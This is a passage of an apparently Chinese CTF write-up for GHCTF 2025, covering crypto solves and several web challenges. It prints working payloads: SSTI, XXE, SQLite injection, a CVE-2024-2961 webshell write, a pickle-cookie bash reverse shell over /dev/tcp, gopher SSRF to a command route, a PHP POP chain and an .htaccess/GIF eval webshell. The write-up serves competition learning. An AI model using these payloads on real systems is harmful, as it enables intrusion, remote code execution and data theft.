113752591438136097752416877421595518178059067044406008965947486693591255247711343925741016027611310257564826355221058212913879375956265361413159461801130112690842862767232535007802294944943540511148985219047761964228666223605898858379133610079745082176804146052086680551043775640630819062323009071190616231206 q= 1010682595723348988315901923086844563134854720501 p= 117574623402990360322255542120443410701206393780334500865748478770699335257408652117586356058603035930256320433146236288486738066821845146885689024168044244453298677322763816219621376364185484753693835156465778487436550070788009331605135011517651578548403565196930955818239577581944709384126001757349228062611 y= 114719310327856435690312712426667059528255758467780345974417610618467568889317865434557927492426543544900066735337367408842750916882737134575812646864528120528284507025781167314123831868039617392195979751697057669675359335622753482920688147222344801914086866640706838774098397923450797553056502975678740968481 ciphertext = b'\x10\xbcL|\xcb\xe5W\x1e0\xa3\x83\x85vr^SmU\xac\xe3L\x93"#\xb4\x81\xd0\xf0S\x05\xb7\xc7' ''' 
首先是维纳攻击 ,这个没什么好说的,直接套板子
然后是熟悉的DSA ,去年的国城杯CTF 也接触过一题,不过那题是关系k攻击(k2=k1^2),这题是 线性k攻击(k2=k1+ink) ,还是参考的这篇博客 
from  Crypto.Util.number import  *import  hashlibfrom  Crypto.Cipher import  AESh = int (hashlib.sha256(b'GHCTF-2025' ).digest().hex (), 16 ) c_ink = 75517502692097831363443739147565176367247985201143975453326891807623085586665800338505194812511215986799510259417486636115714543892322380908775898968005967267154089356401466517827082639942650711458196552847137272733225451581167527549711435805194039361007506436462393605949663173972848316802086005675594122447  e = 97127528017076464922170978933159739328499830874876612140194720448608536284451056980759925228574802703400503852897647806707933102198339936307176078592550748707182506634151382952065240918923594664309561466538540752851827183955776181255541306419282376724578231110985180090748520497985751591062886932254909959583  N = 131342286566556880877092331187418465653855813425966929864425381510875531237549624989644814104311810243468058174748867544024292263674725375273146689145421426693384862215460097683187892351130513429928063652701077721570140977719823754701988835199434602294597102748436781125528389125846980183998136743830655746063  (r1, s1) = (116607429176396769010327954525649019081679807573 ,             242024511677350537268048640408155954695100314686 ) (r2, s2) = (282969697665204582571637561594660002955972273916 ,             233488943967710383661411268886726155900968304282 ) g = 113752591438136097752416877421595518178059067044406008965947486693591255247711343925741016027611310257564826355221058212913879375956265361413159461801130112690842862767232535007802294944943540511148985219047761964228666223605898858379133610079745082176804146052086680551043775640630819062323009071190616231206  q = 1010682595723348988315901923086844563134854720501  p = 117574623402990360322255542120443410701206393780334500865748478770699335257408652117586356058603035930256320433146236288486738066821845146885689024168044244453298677322763816219621376364185484753693835156465778487436550070788009331605135011517651578548403565196930955818239577581944709384126001757349228062611  y = 114719310327856435690312712426667059528255758467780345974417610618467568889317865434557927492426543544900066735337367408842750916882737134575812646864528120528284507025781167314123831868039617392195979751697057669675359335622753482920688147222344801914086866640706838774098397923450797553056502975678740968481  ciphertext = b'\x10\xbcL|\xcb\xe5W\x1e0\xa3\x83\x85vr^SmU\xac\xe3L\x93"#\xb4\x81\xd0\xf0S\x05\xb7\xc7'  def  continuedFra (x, y ):    cf = []     while  y:         cf.append(x // y)         x, y = y, x % y     return  cf def  gradualFra (cf ):    numerator = 0        denominator = 1        for  x in  cf[::-1 ]:         numerator, denominator = denominator, x * denominator + numerator     return  numerator, denominator def  getGradualFra (cf ):    gf = []     for  i in  range (1 , len (cf) + 1 ):         gf.append(gradualFra(cf[:i]))     return  gf def  wienerAttack (e, n ):    res = []     cf = continuedFra(e, n)     gf = getGradualFra(cf)     for  d, k in  gf:         if  d.bit_length() == 200 :             res.append(d)     return  res d = wienerAttack(e, N) for  i in  d:    ink = pow (c_ink, i, N)     k = (h*r2 - h*r1 + ink*s2*r1) * inverse(s1*r2 - s2*r1, q) % q     pri = (k*s1 - h) * inverse(r1, q) % q     key = hashlib.sha1(str (pri).encode()).digest()[:16 ]     cipher = AES.new(key, AES.MODE_ECB)     flag = cipher.decrypt(ciphertext)     if  b'NSSCTF'  in  flag:         print (flag.decode())         break  
from  Crypto.Util.number import  bytes_to_longprint ((2  * sin((m := bytes_to_long(b'NSSCTF{test_flag}' ))) - 2  * sin(m) * cos(2  * m)).n(1024 ))''' m的值即为flag 0.002127416739298073705574696200593072466561264659902471755875472082922378713642526659977748539883974700909790177123989603377522367935117269828845667662846262538383970611125421928502514023071134249606638896732927126986577684281168953404180429353050907281796771238578083386883803332963268109308622153680934466412 ''' 
这题让我想起了SHCTF2024-week3-大学×高中√ 4 s i n 3 ( m ) 4sin^{3}(m) 4 s i n 3 ( m ) 
因为我们不知道flag的长度,所以格最后一列的大系数得测试一下(拿SH那题测),发现大概是flag位数的两倍 这样就能出
from  Crypto.Util.number import  *leak = 0.002127416739298073705574696200593072466561264659902471755875472082922378713642526659977748539883974700909790177123989603377522367935117269828845667662846262538383970611125421928502514023071134249606638896732927126986577684281168953404180429353050907281796771238578083386883803332963268109308622153680934466412  leak = (leak / 4 )^(1 /3 ) asin = arcsin(leak) RF = RealField(1024 ) pi = RF(pi) for  i in  range (1 ,1000 ):    k = i*8      k0 = k*2      M = Matrix(QQ,[[1 ,0 ,2 ^k0],[0 ,2 ^k,2 ^k0*asin],[0 ,0 ,2 ^k0*2 *pi]])     m = abs (M.LLL()[0 ][0 ])     flag = long_to_bytes(int (m))     if  b'NSSCTF'  in  flag:         print (i)         print (flag.decode())         break  
from  Crypto.Cipher import  AESfrom  Crypto.Util.Padding import  padfrom  hashlib import  md5from  secret import  flag, seed, maskclass  踩踩背 :    def  __init__ (self, n, seed, mask, lfsr=None  ):         self.state = [int (b) for  b in  f"{seed:0 {n} b}" ]         self.mask_bits = [int (b) for  b in  f"{mask:0 {n} b}" ]         self.n = n         self.lfsr = lfsr     def  update (self ):         s = sum ([self.state[i] * self.mask_bits[i] for  i in  range (self.n)]) & 1          self.state = self.state[1 :] + [s]     def  __call__ (self ):         if  self.lfsr:             if  self.lfsr():                 self.update()             return  self.state[-1 ]         else :             self.update()             return  self.state[-1 ] class  奶龙 (踩踩背 ):    def  __init__ (self, n, seed, mask ):         super ().__init__(n, seed, mask, lfsr=None ) n = 64  assert  seed.bit_length == mask.bit_length == nlfsr1 = 奶龙(n, seed, mask) lfsr2 = 踩踩背(n, seed, mask, lfsr1) print (f"mask = {mask} " )print (f"output = {sum (lfsr2() << (n - 1  - i) for  i in  range (n))} " )print (f"enc = {AES.new(key=md5(str (seed).encode()).digest(), mode=AES.MODE_ECB).encrypt(pad(flag, 16 ))} " )
这题就没仔细研究,不好打,当时看着三解,最后五解,就摆了
还是Csome那句话,在这CINTA是基础,Sagemath是工具,糖醋小鸡块的blog是弹药库(狗头) 
import  osimport  refrom  flask import  Flask, request, jsonify,render_template_string,send_from_directory, abort,redirectfrom  werkzeug.utils import  secure_filenameimport  osfrom  werkzeug.utils import  secure_filenameapp = Flask(__name__) UPLOAD_FOLDER = 'static/uploads'    ALLOWED_EXTENSIONS = {'txt' , 'log' , 'text' ,'md' ,'jpg' ,'png' ,'gif' } MAX_CONTENT_LENGTH = 16  * 1024  * 1024    app.config['UPLOAD_FOLDER' ] = UPLOAD_FOLDER app.config['MAX_CONTENT_LENGTH' ] = MAX_CONTENT_LENGTH os.makedirs(UPLOAD_FOLDER, exist_ok=True ) def  is_safe_path (basedir, path ):    return  os.path.commonpath([basedir,path]) def  contains_dangerous_keywords (file_path ):    dangerous_keywords = ['_' , 'os' , 'subclasses' , '__builtins__' , '__globals__' ,'flag' ,]     with  open (file_path, 'rb' ) as  f:         file_content = str (f.read())         for  keyword in  dangerous_keywords:             if  keyword in  file_content:                 return  True        return  False    def  allowed_file (filename ):    return  '.'  in  filename and  \         filename.rsplit('.' , 1 )[1 ].lower() in  ALLOWED_EXTENSIONS @app.route('/' , methods=['GET' , 'POST' ] def  upload_file ():    if  request.method == 'POST' :                  if  'file'  not  in  request.files:             return  jsonify({"error" : "未上传文件" }), 400          file = request.files['file' ]                  if  file.filename == '' :             return  jsonify({"error" : "请选择文件" }), 400                   if  file and  allowed_file(file.filename):                          filename = secure_filename(file.filename)                          save_path = os.path.join(app.config['UPLOAD_FOLDER' ], filename)             file.save(save_path)                          return  jsonify({                 "message" : "File uploaded successfully" ,                 "path" : os.path.abspath(save_path)             }), 200          else :             return  jsonify({"error" : "文件类型错误" }), 400           return  '''      <!doctype html>     <title>Upload File</title>     <h1>Upload File</h1>     <form method=post enctype=multipart/form-data>       <input type=file name=file>       <input type=submit value=Upload>     </form>     ''' @app.route('/file/<path:filename>'  def  view_file (filename ):    try :                  safe_filename = secure_filename(filename)         if  not  safe_filename:             abort(400 , description="无效文件名" )                  file_path = os.path.join(app.config['UPLOAD_FOLDER' ], safe_filename)                  if  not  is_safe_path(app.config['UPLOAD_FOLDER' ], file_path):             abort(403 , description="禁止访问的路径" )                  if  not  os.path.isfile(file_path):             abort(404 , description="文件不存在" )         suffix=os.path.splitext(filename)[1 ]         print (suffix)         if  suffix==".jpg"  or  suffix==".png"  or  suffix==".gif" :             return  send_from_directory("static/uploads/" ,filename,mimetype='image/jpeg' )         if  contains_dangerous_keywords(file_path):                          os.remove(file_path)             return  jsonify({"error" : "Waf!!!!" }), 400          with  open (file_path, 'rb' ) as  f:             file_data = f.read().decode('utf-8' )         tmp_str = """<!DOCTYPE html>          <html lang="zh">         <head>             <meta charset="UTF-8">             <meta name="viewport" content="width=device-width, initial-scale=1.0">             <title>查看文件内容</title>         </head>         <body>             <h1>文件内容:{name}</h1>  <!-- 显示文件名 -->             <pre>{data}</pre>  <!-- 显示文件内容 -->             <footer>                 <p>© 2025 文件查看器</p>             </footer>         </body>         </html>         """ .format (name=safe_filename, data=file_data)        return  render_template_string(tmp_str)     except  Exception as  e:         app.logger.error(f"文件查看失败: {str (e)} " )         abort(500 , description="文件查看失败:{} " .format (str (e))) @app.errorhandler(404  def  not_found (error ):    return  {"error" : error.description}, 404  @app.errorhandler(403  def  forbidden (error ):    return  {"error" : error.description}, 403  if  __name__ == '__main__' :    app.run("0.0.0.0" ,debug=False ) 
文件上传+SSTI return,所以我们选择其他后缀ALLOWED_EXTENSIONS = {'txt', 'log', 'text','md','jpg','png','gif'}
if  suffix==".jpg"  or  suffix==".png"  or  suffix==".gif" :            return  send_from_directory("static/uploads/" ,filename,mimetype='image/jpeg' ) 
然后我们借助我们的老朋友fenjing 跑一个payload 出来
from  fenjing import  exec_cmd_payload, config_payloadimport  logginglogging.basicConfig(level=logging.INFO) def  waf (s: str  ):      blacklist = ['_' , 'os' , 'subclasses' , '__builtins__' , '__globals__' , 'flag' ]     return  all (word not  in  s for  word in  blacklist) if  __name__ == "__main__" :    shell_payload, _ = exec_cmd_payload(waf, "cat /flag" )          print (f"{shell_payload=} " )      
然后就是抓包改一个文件名xxx.md,内容为上面的payload,之后访问/file/xxx.md 
无过滤xxe curl -X POST http://node2.anna.nssctf.cn:28796/ghctf --data-urlencode 'xml=<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///flag">]><root><name>&xxe;</name></root>'
id=1 order by 6判断列数为5,然后习惯性查database(),没查到,原来是sqlite注入 (题目算个提示)
id=1 union select 1,2,3,4,(select sql from sqlite_master)--,查到表名和列名
id=1 union select 1,2,3,4,(select group_concat(flag) from flag)--,查到数据
emmm,据说sqlmap的话要开--random-agent,好防,我好像也没跑出来
<?php   show_source (__FILE__ );   if  (md5 ($_POST ['a' ]) === md5 ($_POST ['b' ])) {       if  ($_POST ['a' ] != $_POST ['b' ]) {           if  (is_string ($_POST ['a' ]) && is_string ($_POST ['b' ])) {               echo  file_get_contents ($_GET ['file' ]);           }       }   } ?> 
奇怪,网上找的字符串,强碰撞yakit,bp这些都发包不成功导致了读不到文件,然后下面是当时打SHCTF2024fastcoll 生成的文件
import  requestswith  open ("D:\\ctf-learning\\Misc_learning\\fastcoll\\sh_msg1.txt" , 'rb' ) as  f:    a = f.read() with  open ("D:\\ctf-learning\\Misc_learning\\fastcoll\\sh_msg2.txt" , 'rb' ) as  f:    b = f.read() data = {     'a' : a,     'b' : b } url = "http://node2.anna.nssctf.cn:28002/?file=/etc/passwd"  res = requests.post(url, data=data) print (res.text)
通过file_get_contents实现命令执行,可以参考这篇去年5月份就发的cve-2024-2961 ,然后是春秋杯夏季赛 ,说实话不关注这些东西,真不好在网上慢慢找
这里用到的是kezibei的脚本 cmd = "echo '<?php system($_GET[\"cmd\"]); ?>' > /var/www/html/shell.php"
这里我们需要有maps和libc.so(路径翻一下前者即可得到)文件(跟上面的脚本放在同一目录下即可),前者直接下载复制保存即可,后者因为响应里面还有页面信息,而且内容较大,得保存到文件中,再删除掉文件前面的东西即可
url = "http://node2.anna.nssctf.cn:28002/?file=/proc/self/maps"  res = requests.post(url, data=data) print (res.text)url = "http://node2.anna.nssctf.cn:28002/?file=/lib/x86_64-linux-gnu/libc-2.31.so"  res = requests.post(url, data=data) with  open ("D:\\ctf-learning\\CVE\\cve-2024-2961-LFI\\php-filter-iconv\\libc-2.31.so" , 'w' ) as  f:    f.write(res.content) 
然后在有pwn环境的主机 中运行php-filter-iconv.py即可,我这里用的是wsl2+ubuntu22.04 ,把payload打入上面的exp,访问题目url/shell.php?cmd=cat /f *即可
看了官方wp,居然有非预期/docker-entrypoint.sh 
#!/bin/bash if  [ "$DASFLAG "  ]; then     INSERT_FLAG="$DASFLAG "  elif  [ "$FLAG "  ]; then     INSERT_FLAG="$FLAG "  elif  [ "$GZCTF_FLAG "  ]; then     INSERT_FLAG="$GZCTF_FLAG "  else     INSERT_FLAG="flag{TEST_Dynamic_FLAG}"  fi echo  $INSERT_FLAG  > /f1wlxekj1lwjek1lkejzs1lwje1lwesjk1wldejlk1wcejl1kwjelk1wjcle1jklwecj1lkwcjel1kwjel1cwjl1jwlkew1jclkej1wlkcj1lkwej1lkcwjellagsource  /etc/apache2/envvarsecho  "Running..."  &tail  -F /var/log/apache2/* &exec  apache2 -D FOREGROUND
直接爆破admin 的密码得到admin123 
POST参数发现可以任意文件读取 ,我们直接读源文件/app/app.py session_pickle 
from  flask import  Flask, request, redirect, make_response,render_templatefrom  cryptography.hazmat.primitives.ciphers import  Cipher, algorithms, modesfrom  cryptography.hazmat.backends import  default_backendfrom  cryptography.hazmat.primitives import  paddingimport  pickleimport  hmacimport  hashlibimport  base64import  timeimport  osapp = Flask(__name__) def  generate_key_iv ():    key = os.environ.get('SECRET_key' ).encode()     iv = os.environ.get('SECRET_iv' ).encode()     return  key, iv def  aes_encrypt_decrypt (data, key, iv, mode='encrypt'  ):    cipher = Cipher(algorithms.AES(key), modes.CBC(iv), backend=default_backend())     if  mode == 'encrypt' :         encryptor = cipher.encryptor()         padder = padding.PKCS7(algorithms.AES.block_size).padder()         padded_data = padder.update(data.encode()) + padder.finalize()         result = encryptor.update(padded_data) + encryptor.finalize()         return  base64.b64encode(result).decode()       elif  mode == 'decrypt' :         decryptor = cipher.decryptor()         encrypted_data_bytes = base64.b64decode(data)         decrypted_data = decryptor.update(encrypted_data_bytes) + decryptor.finalize()         unpadder = padding.PKCS7(algorithms.AES.block_size).unpadder()         unpadded_data = unpadder.update(decrypted_data) + unpadder.finalize()         return  unpadded_data.decode() users = {     "admin" : "admin123" , } def  create_session (username ):    session_data = {         "username" : username,         "expires" : time.time() + 3600        }     pickled = pickle.dumps(session_data)     pickled_data = base64.b64encode(pickled).decode('utf-8' )     key,iv=generate_key_iv()     session=aes_encrypt_decrypt(pickled_data, key, iv,mode='encrypt' )     return  session def  dowload_file (filename ):    path=os.path.join("static" ,filename)     with  open (path, 'rb' ) as  f:         data=f.read().decode('utf-8' )     return  data def  validate_session (cookie ):    try :         key, iv = generate_key_iv()         pickled = aes_encrypt_decrypt(cookie, key, iv,mode='decrypt' )         pickled_data=base64.b64decode(pickled)         session_data = pickle.loads(pickled_data)         if  session_data["username" ] !="admin" :             return  False          return  session_data if  session_data["expires" ] > time.time() else  False      except :         return  False  @app.route("/" ,methods=['GET' ,'POST' ] def  index ():    if  "session"  in  request.cookies:         session = validate_session(request.cookies["session" ])         if  session:             data=""              filename=request.form.get("filename" )             if (filename):                 data=dowload_file(filename)             return  render_template("index.html" ,name=session['username' ],file_data=data)     return  redirect("/login" ) @app.route("/login" , methods=["GET" , "POST" ] def  login ():    if  request.method == "POST" :         username = request.form.get("username" )         password = request.form.get("password" )         if  users.get(username) == password:             resp = make_response(redirect("/" ))             resp.set_cookie("session" , create_session(username))             return  resp         return  render_template("login.html" ,error="Invalid username or password" )     return  render_template("login.html" ) @app.route("/logout"  def  logout ():    resp = make_response(redirect("/login" ))     resp.delete_cookie("session" )     return  resp if  __name__ == "__main__" :    app.run(host="0.0.0.0" ,debug=False ) 
通过create_session()函数,我们知道session数据 经过了pickle序列化 +base64编码 +AES加密 
这里aes加解密需要key、iv ,而且是从环境变量 获取的,我们可以直接读/proc/self/environ ,得到
PYTHON_SHA256=bfb249609990220491a1b92850a07135ed0831e41738cf681d63cf01b2a8fbd1 HOSTNAME=ab49bc3fc05a4391 PYTHON_VERSION=3.10.16 PWD=/app HOME=/root LANG=C.UTF-8 GPG_KEY=A035C8C19219BA821ECEA86B64E628F8D684696D FLAG=no_FLAG SECRET_key=ajwdopldwjdowpajdmslkmwjrfhgnbbv SHLVL=1 PATH=/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin SECRET_iv=asdwdggiouewhgpw _=/usr/local/bin/flask OLDPWD=/ 
参照题目脚本,挫一下exp,因为没有回显,所以直接读是读不出来的
下面有三种方向,反弹shell、覆盖/追加写、内存马 
from  cryptography.hazmat.primitives.ciphers import  Cipher, algorithms, modesfrom  cryptography.hazmat.backends import  default_backendfrom  cryptography.hazmat.primitives import  paddingimport  requestsimport  base64import  pickledef  aes_encrypt (data, key, iv ):    cipher = Cipher(algorithms.AES(key), modes.CBC(iv),                     backend=default_backend())     encryptor = cipher.encryptor()     padder = padding.PKCS7(algorithms.AES.block_size).padder()     padded_data = padder.update(data.encode()) + padder.finalize()     result = encryptor.update(padded_data) + encryptor.finalize()     return  base64.b64encode(result).decode() key = b'ajwdopldwjdowpajdmslkmwjrfhgnbbv'  iv = b'asdwdggiouewhgpw'  data = b'''(cos  system S'bash -c "bash -i >& /dev/tcp/ip/port 0>&1"' o.''' data = b'''(cos  system S'cat /flag* > /app/app.py' o.''' pickled_data = base64.b64encode(data).decode('utf-8' ) session = aes_encrypt(pickled_data, key, iv) url = 'http://node6.anna.nssctf.cn:24514/'  res = requests.post(url, cookies={'session' : session}) print (res.text)
官方wp这里用的就是内存马 
什么信息都收集不到,直接扫目录 ,拿到/app.py
from  flask import  Flask, request, send_file, render_template_stringimport  osfrom  urllib.parse import  urlparse, urlunparseimport  subprocessimport  socketimport  hashlibimport  base64import  randomapp = Flask(__name__) BlackList = [     "127.0.0.1"  ] @app.route('/'  def  index ():    return  ''' ... '''  @app.route('/Login' , methods=['GET' , 'POST' ] def  login ():    junk_code()     if  request.method == 'POST' :         username = request.form.get('username' )         password = request.form.get('password' )         if  username in  users and  users[username]['password' ] == hashlib.md5(password.encode()).hexdigest():             return  b64e(f"Welcome back, {username} !" )         return  b64e("Invalid credentials!" )     return  render_template_string("""...""" ) @app.route('/Gopher'  def  visit ():    url = request.args.get('url' )     if  url is  None :         return  "No url provided :)"      url = urlparse(url)     realIpAddress = socket.gethostbyname(url.hostname)     if  url.scheme == "file"  or  realIpAddress in  BlackList:         return  "No (≧∇≦)"      result = subprocess.run(["curl" , "-L" , urlunparse(url)], capture_output=True , text=True )     return  result.stdout @app.route('/RRegister' , methods=['GET' , 'POST' ] def  register ():    junk_code()     if  request.method == 'POST' :         username = request.form.get('username' )         password = request.form.get('password' )         if  username in  users:             return  b64e("Username already exists!" )         users[username] = {'password' : hashlib.md5(password.encode()).hexdigest()}         return  b64e("Registration successful!" )     return  render_template_string("""...""" ) @app.route('/Manage' , methods=['POST' ] def  cmd ():    if  request.remote_addr != "127.0.0.1" :         return  "Forbidden!!!"      if  request.method == "GET" :         return  "Allowed!!!"      if  request.method == "POST" :         return  os.popen(request.form.get("cmd" )).read() @app.route('/Upload' , methods=['GET' , 'POST' ] def  upload_avatar ():    junk_code()     if  request.method == 'POST' :         username = request.form.get('username' )         if  username not  in  users:             return  b64e("User not found!" )         file = request.files.get('avatar' )         if  file:             file.save(os.path.join(avatar_dir, f"{username} .png" ))             return  b64e("Avatar uploaded successfully!" )         return  b64e("No file uploaded!" )     return  render_template_string("""...""" ) @app.route('/app.py'  def  download_source ():    return  send_file(__file__, as_attachment=True ) if  __name__ == '__main__' :    app.run(host='0.0.0.0' , port=8000 ) 
只需关注Gopher 和Manage 这两个路由,Gopher路由 这里就无法使用file://协议 直接实现读取,同时发现Manage路由 可以实现命令执行 os.popen(request.form.get("cmd")).read()
由于Gopher路由 可以处理进程 ,那么我们的思路就是通过Gopher路由 打SSRF 到Manage路由 ,从而实现命令执行 
这里借助gopher://协议 实现SSRF 
gopher协议是一个古老且强大的协议,可以理解为是http协议的前身,他可以实现多个数据包整合发送。通过gopher协议可以攻击内网的 FTP、Telnet、Redis、Memcache,也可以进行 GET、POST 请求 很多时候在SSRF下,我们无法通过HTTP协议来传递POST数据,这时候就需要用到gopher协议来发起POST请求了 格式 URL: gopher://<host>:<port>/<gopher-path>_后接TCP数据流 注意不要忘记后面那个下划线"_" ,下划线"_" 后面才开始接TCP数据流,如果不加这个"_" ,那么服务端收到的消息将不是完整的,该字符可随意写 
同时注意Gopher路由 这里还有解析 为127.0.0.1 的黑名单,下面有两种方式绕过
0 (缺省路由的写法也可以代表0.0 .0 .0 ) 0.0 .0 .0  都代表本地127. x.x.x 除了.1 都行,都是环回地址
构造Manage路由 的POST包 ,直接查看环境变量 
POST /Manage HTTP/1.1 host:127.0.0.1 Content-Type:application/x-www-form-urlencoded Content-Length:7 cmd=env  
题目代码中,result = subprocess.run(["curl", "-L", urlunparse(url)], capture_output=True, text=True),因此我们这里需要二次URL编码 (也是gopher协议 的常见操作了),同时题目代码这里也可以看见开放的是8000端口 
payload如下:
/Gopher?url=gopher://0.0.0.0:8000/_POST%2520%252FManage%2520HTTP%252F1.1%250Ahost%253A127.0.0.1%250AContent-Type%253Aapplication%252Fx-www-form-urlencoded%250AContent-Length%253A7%250A%250Acmd%253Denv 
也发现了一个半自动化脚本吧
import  urllib.parsepayload = "cmd=ls /"  payload_len = len (payload) def  http_to_gopher (http_request: str , host: str , port: int  = 80  ):    lines = http_request.split("\n" )     request_line = lines[0 ].split()     method = request_line[0 ]     path = request_line[1 ]     headers = {}     body = ""      for  line in  lines[1 :]:         if  not  line.strip():             continue          if  ":"  in  line:             key, value = line.split(":" , 1 )             headers[key.strip()] = value.strip()         else :             body = line.strip()     gopher_payload = f"{method}  {path}  HTTP/1.1\r\n"      gopher_payload += f"Host: {host} :{port} \r\n"      for  key, value in  headers.items():         gopher_payload += f"{key} : {value} \r\n"      if  body:         gopher_payload += f"\r\n{body} "      gopher_payload += "\r\n\r\n"      double_encoded_payload = urllib.parse.quote(urllib.parse.quote(gopher_payload))     gopher_url = f"gopher://{host} :{port} /_{double_encoded_payload} "      return  gopher_url http_request = f"""POST /Manage HTTP/1.1  Host: 0.0.0.0:8000 Content-Type: application/x-www-form-urlencoded Content-Length: {payload_len}  {payload} """ print (http_to_gopher(http_request, "0.0.0.0" , 8000 ))
<?php error_reporting (0 );class  CherryBlossom      public  $fruit1 ;     public  $fruit2 ;     public  function  __construct ($a          $this ->fruit1 = $a ;     }     function  __destruct (         echo  $this ->fruit1;     }     public  function  __toString (         $newFunc  = $this ->fruit2;         return  $newFunc ();     } } class  Forbidden      private  $fruit3 ;     public  function  __construct ($string          $this ->fruit3 = $string ;     }     public  function  __get ($name          $var  = $this ->$name ;         $var [$name ]();     } } class  Warlord      public  $fruit4 ;     public  $fruit5 ;     public  $arg1 ;     public  function  __call ($arg1 , $arg2          $function  = $this ->fruit4;         return  $function ();     }     public  function  __get ($arg1          $this ->fruit5->ll2 ('b2' );     } } class  Samurai      public  $fruit6 ;     public  $fruit7 ;     public  function  __toString (         $long  = @$this ->fruit6->add ();         return  $long ;     }     public  function  __set ($arg1 , $arg2          if  ($this ->fruit7->tt2) {             echo  "xxx are the best!!!" ;         }     } } class  Mystery      public  function  __get ($arg1          array_walk ($this , function ($day1 , $day2 ) {             $day3  = new  $day2 ($day1 );             foreach  ($day3  as  $day4 ) {                 echo  ($day4  . '<br>' );             }         });     } } class  Princess      protected  $fruit9 ;     protected  function  addMe (         return  "The time spent with xxx is my happiest time"  . $this ->fruit9;     }     public  function  __call ($func , $args          call_user_func ([$this , $func  . "Me" ], $args );     } } class  Philosopher      public  $fruit10 ;     public  $fruit11 ="sr22kaDugamdwTPhG5zU" ;     public  function  __invoke (         if  (md5 (md5 ($this ->fruit11)) == 666 ) {             return  $this ->fruit10->hey;         }     } } class  UselessTwo      public  $hiddenVar  = "123123" ;     public  function  __construct ($value          $this ->hiddenVar = $value ;     }     public  function  __toString (         return  $this ->hiddenVar;     } } class  Warrior      public  $fruit12 ;     private  $fruit13 ;     public  function  __set ($name , $value          $this ->$name  = $value ;         if  ($this ->fruit13 == "xxx" ) {             strtolower ($this ->fruit12);         }     } } class  UselessThree      public  $dummyVar ;     public  function  __call ($name , $args          return  $name ;     } } class  UselessFour      public  $lalala ;     public  function  __destruct (         echo  "Hehe" ;     } } if  (isset ($_GET ['GHCTF' ])) {    unserialize ($_GET ['GHCTF' ]); } else  {     highlight_file (__FILE__ ); } 
PHP反序列化,构造pop链 
__construct 类的构造函数,在类实例化对象时自动调用构造函数 __destruct  类的析构函数,在对象销毁之前自动调用析构函数 __toString  当使用echo 或print 输出对象将对象转化为字符串形式时,会调用__toString ()方法 __get   当访问一个对象的不存在或不可访问的属性时自动调用,传递属性名作为参数 __call  调用不存在或不可见的成员方法时,PHP会先调用__call ()方法来存储方法名及其参数 __set ($property , $value )  当给一个对象的不存在或不可访问(private 修饰)的属性赋值时自动调用,传递属性名和属性值作为参数__invoke    当将一个对象作为函数进行调用时自动调用 
发现了原生类 ,new $day2($day1),同时发现了遍历函数foreach() ,直接借助DirectoryIterator类 进行目录遍历 ,然后就是SplFileObject类 读取文件,其他能构造恶意代码的地方没找到
有了这个突破点,我们就可以逆回去,向上构造 ,看看哪个类可以触发__get(),发现Philosopher 有个hey属性 是不存在 的,那么现在要触发的是__invoke(),一般找的都是return xxx(); ,有两个,就CherryBlossom吧
pop链为:CherryBlossom:__destruct()->CherryBlossom::__toString()->Philosopher::__invoke()->Mystery::__get() 
双重MD5绕过 ,php弱比较 中会截取字符串的数字,直至遇到字母截止,比如’11e33’,就会被读取为11,然后进行比较,改一下这个py2的脚本
import  multiprocessingimport  hashlibimport  randomimport  stringCHARS = string.ascii_letters + string.digits def  cmp_md5 (substr, stop_event, str_len, start=0 , size=20  ):    global  CHARS     while  not  stop_event.is_set():         rnds = '' .join(random.choice(CHARS) for  _ in  range (size))         value1 = hashlib.md5(rnds.encode()).hexdigest()         if  value1[start: start+str_len] == substr:                                                    value2 = hashlib.md5(value1.encode()).hexdigest()             if  value2[start: start+str_len] == substr:                 print (rnds + "=>"  + value1 + "=>"  + value2 + "\n" )                 stop_event.set () if  __name__ == '__main__' :    substr = '666'      start_pos = 0      str_len = len (substr)     cpus = multiprocessing.cpu_count()     stop_event = multiprocessing.Event()     processes = [multiprocessing.Process(target=cmp_md5, args=(substr,                                          stop_event, str_len, start_pos))                  for  i in  range (cpus)]     for  p in  processes:         p.start()     for  p in  processes:         p.join() 
可以跑得一个,O7it1qaAgBbfAL9OVPyO 
至于怎么给day1,day2赋值,官方文档 有提及的,涉及到回调处理,day1为值,day2为键
为了减少代码,其实可以只保留需要的属性即可,效果是一样的,而且出题人居然塞了这么多无用的类进来,晕
<?php class  CherryBlossom     public  $fruit1 ;     public  $fruit2 ; } class  Mystery  class  Philosopher     public  $fruit10 ;     public  $fruit11  = "O7it1qaAgBbfAL9OVPyO" ; } $a  = new  CherryBlossom ();$a ->fruit1 = new  CherryBlossom ();$a ->fruit1->fruit2 = new  Philosopher ();$a ->fruit1->fruit2->fruit10 = new  Mystery ();$a ->fruit1->fruit2->fruit10->SplFileObject  = "/flag44545615441084" ;echo  serialize ($a );
尝试了一下,题目对文件后缀和文件内容进行了过滤,然后上传一张gif的时候发现,GIF89a可以绕过检测
然后我们也可以知道题目用的是Apache服务器 ,再上传一个.htaccess使其按PHP文件解析 
然后试多几次发现不限制尺寸 是无法上传的,参考博客 
.htaccess
<FilesMatch ".gif" > SetHandler application/x-httpd-php </FilesMatch> 
shell.gif
GIF89a <?php  eval ($_GET [1 ]);?> 
访问/images/shell.gif?1=system("cat /flag");
<?php highlight_file (__FILE__ );class  ConfigLoader      private  $config ;     public  function  __construct (         $this ->config = [             'debug'  => true ,             'mode'  => 'production' ,             'log_level'  => 'info' ,             'max_input_length'  => 100 ,             'min_password_length'  => 8 ,             'allowed_actions'  => ['run' , 'debug' , 'generate' ]         ];     }     public  function  get ($key          return  $this ->config[$key ] ?? null ;     } } class  Logger      private  $logLevel ;     public  function  __construct ($logLevel          $this ->logLevel = $logLevel ;     }     public  function  log ($message , $level  = 'info'          if  ($level  === $this ->logLevel) {             echo  "[LOG] $message \n" ;         }     } } class  UserManager      private  $users  = [];     private  $logger ;     public  function  __construct ($logger          $this ->logger = $logger ;     }     public  function  addUser ($username , $password          if  (strlen ($username ) < 5 ) {             return  "Username must be at least 5 characters" ;         }         if  (strlen ($password ) < 8 ) {             return  "Password must be at least 8 characters" ;         }         $this ->users[$username ] = password_hash ($password , PASSWORD_BCRYPT);         $this ->logger->log ("User $username  added" );         return  "User $username  added" ;     }     public  function  authenticate ($username , $password          if  (isset ($this ->users[$username ]) && password_verify ($password , $this ->users[$username ])) {             $this ->logger->log ("User $username  authenticated" );             return  "User $username  authenticated" ;         }         return  "Authentication failed" ;     } } class  StringUtils      public  static  function  sanitize ($input          return  